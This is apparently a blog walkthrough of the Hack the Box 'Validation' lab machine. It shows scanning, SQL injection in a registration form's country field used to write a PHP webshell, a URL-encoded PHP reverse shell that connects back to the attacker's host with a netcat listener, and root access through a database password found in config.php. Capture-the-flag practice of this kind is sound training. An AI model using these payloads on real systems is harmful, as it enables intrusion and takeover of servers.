Validation

Date: March 14th 2022

Author: j.info

Link: Validation CTF on Hack the Box

Hack the Box Difficulty Rating: Easy

Objectives

user own
system own

Initial Enumeration

Nmap Scan

sudo nmap -sC -sV -A -T4 10.10.11.116

PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http          Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open     http          nginx

Gobuster Scan

gobuster dir -u http://10.10.11.116 -t 100 -r -x php,txt,html -w dir-med.txt

/account.php          (Status: 200) [Size: 16]
/config.php           (Status: 200) [Size: 0]
/css                  (Status: 403) [Size: 277]
/js                   (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 16088]

Website Digging and SQLi

Visiting the main page:

I look at the page source code and don’t find anything interesting. There are no cookies assigned to us. Checking out account.php and config.php don’t lead to anything interesting.

At this point registering looks like the best bet.

I register a user called testuser and get:

Still nothing interesting in the page source, but we do now have a cookie assigned to us. Inspecting the cookie it turns out to be an MD5 hash of our username:

I try to use some of the standard SQLi variations such as ’ or 1=1 and admin’ – in the username field and no luck.

I start up burp and capture a registration request which shows us there are 2 parameters to test with, username and country.

I send the request over to burp repeater for further experimentation.

Adding a ‘ after the country parameter gets us an error message so it looks our input isn’t sanitized and we can potentially use that for injection:

I send the following through to test and it works without an error message. This shows us the user is uhc@localhost and we now know the format to prevent errors:

username=testuser&country=Argentina' UNION SELECT user()-- -

There’s a lot we could do here but I’m going to go straight for creating my own PHP file to use as a webshell. I use INTO OUTFILE to create a file called test.php with the following in it:

If successful this will allow us to navigate to test.php and provide it a ?test=whatever command we want. Navigating to it via this URL:

http://10.10.11.116/test.php?test=hostname

We get back:

So, our webshell is working. Let’s see about getting a reverse shell now.

System Access

I test several different shells from revshells.com and ultimately end up with the PHP proc_open shell working after URL encoding it.

Navigating to the URL with the reverse shell code inserted and a listener running on my system:

http://10.10.11.116/test.php?test=php%20-r%20%27$sock=fsockopen(%22MY IP%22,4444);$proc=proc_open(%22bash%22,%20array(0=%3E$sock,%201=%3E$sock,%202=%3E$sock),$pipes);%27

─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [MY IP] from (UNKNOWN) [10.10.11.116] 43160
ls
account.php
config.php
css
index.php
js
test.php

So we have shell but it’s a very ugly one that I’ll upgrade to something a little easier to work with. I check to see if python or python3 are on the system and they aren’t so I end up using the script method:

script -qc /bin/bash /dev/null
CTRL+Z to background my session
stty raw -echo; fg; reset
export TERM=xterm

With that we have an interactive shell that’s much better to work with.

User Own

I change over to the /home directory and the only user listed there is htb. Changing to that directory lists only one file: user.txt

cat user.txt

45802ac6cc0565a676343bd99a362125

System Enumeration

I open up the database and login but don’t find anything useful inside of it.

I look for some of the more common escalation vectors like files with SUID or capabilities and don’t find anything. Nothing in /opt. No backups in /var/backups. Nothing out of the ordinary in /tmp.

Looking in the / directory shows us that we’re in docker container since it lists a .dockerenv file.

I try several methods to transfer linpeas or deepce over to the container but none of them work, so it’s back to manual enumeration.

Checking /var/www/html to see what we have in the websites directory I find a file called config.php. Viewing it shows us a username and password for an SQL database called registration.

<?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-9qual-global-pw";
  $dbname = "registration";

  $conn = new mysqli($servername, $username, $password, $dbname);
?>

I login and look through the database but there isn’t anything useful that I can find.

Root Own

Finally I try to use the password on the root user and it works. I know it said global in it, but I wasn’t expecting that for sure. And I also wasn’t expecting this to be the end of the box figuring we’d have to escape the container, but the root flag is sitting there in the root directory.

su root

www-data@validation:/$ su root
Password: 
root@validation:/# cat /root/root.txt
cae6b7bbd0642279d781299d77f55d28

With that we’ve completed this CTF!

Conclusion

A quick run down of what we covered in this CTF:

Basic enumeration with nmap and gobuster
Using burp to inspect and modify requests
SQLi to create our own PHP webshell on the system
Using our PHP webshell to obtain a reverse shell
Finding credentials in a config file and using them to login as root

Many thanks to:

ippsec for creating this CTF.
Hack the Box for hosting this CTF.

You can visit them at: https://www.hackthebox.com

j.info Cybersecurity Blog

A blog dedicated to learning about cybersecurity, and sharing CTF walkthroughs